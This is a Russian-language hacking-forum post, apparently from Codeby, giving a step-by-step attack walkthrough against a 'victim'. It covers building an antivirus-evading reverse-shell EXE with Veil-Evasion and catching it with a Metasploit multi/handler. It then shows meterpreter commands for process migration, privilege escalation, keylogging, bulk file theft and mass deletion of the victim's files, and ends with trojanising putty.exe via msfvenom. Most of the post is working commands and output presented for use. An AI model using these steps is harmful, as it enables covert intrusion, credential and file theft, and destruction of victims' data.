admin

По любому вопросу
Администратор
1,650
1,505
5 Мар 2016
Схема взлома описанная в статье (Codeby)
rIaUefj.png

[HIDEL="1"]
С помощью Veil-Evasion мы попытаемся обойти антивирус, создав файл с полезной нагрузкой в формате .EXE.
Устанавливаем Veil-Evasion, фреймворк надо клонировать с GitHub, но не надо устанавливать его через apt-get install Veil-Evasion.
Нам потребуется выполнить следующие команды:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
./setup.sh -c
Все, мы установили Veil, теперь нам нужно запустить его, запускаем файл Veil-Evasion.py.
Уже внутри ввежем команду list что б получить список доступных payload.
Выбираем нужный нам, у меня это будет reverse_https, у него 32-й номер. Вводим команду:
Код:
use (Нужный нам номер)
Задаем нужные нам опции, тут все просто;
Код:
set LHOST 127.0.0.1 (Наш публичный IP)
set LPORT 443 (По умолчанию HTTPS URL использует 443 ТСР-порт (Для незащищенного HTTP - 80)
set USE_PYHERION Y (Используем энкриптор)
generate (Создаем файл)
Вводим имя будущего .EXE
Выбираем вторую строку, Pwnstaller.
Все, файл сгенерирован
Файл уже готов, доставляем его на компьютер/сервер жертве.
С Veil-Evasion мы пока-что закончили. Выходим, запускаем Metasploit:
Код:
в консоле msfconsole
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler) > set LPORT 443
msf exploit (handler) > exploit
После чего когда файл будет загружен, вы увидете сессию meterpreter.
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.
migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.
1. Кейлоггер
meterpreter > bgrun keylogrecorder
[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording
meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...
2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:
run file_collector -r -d e:\\ -f * -o /root/ file.txt
Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst
Скачиваем файлы на свой компьютер.
run file_collector -i /root /file.lst -l /root/
Полагаю не нужно обьяснять, что делают скрипты upload и download)
3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.
4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell
Удаление файлов exe:
del e:\*.* /f /s /q
удаление файлов doc:
del e:\*.doc /f /s /q
удаление файлов pdf:
del e:\*.pdf /f /s /q
5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe
Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.
[/HIDEL]
 

Вложения

Последнее редактирование: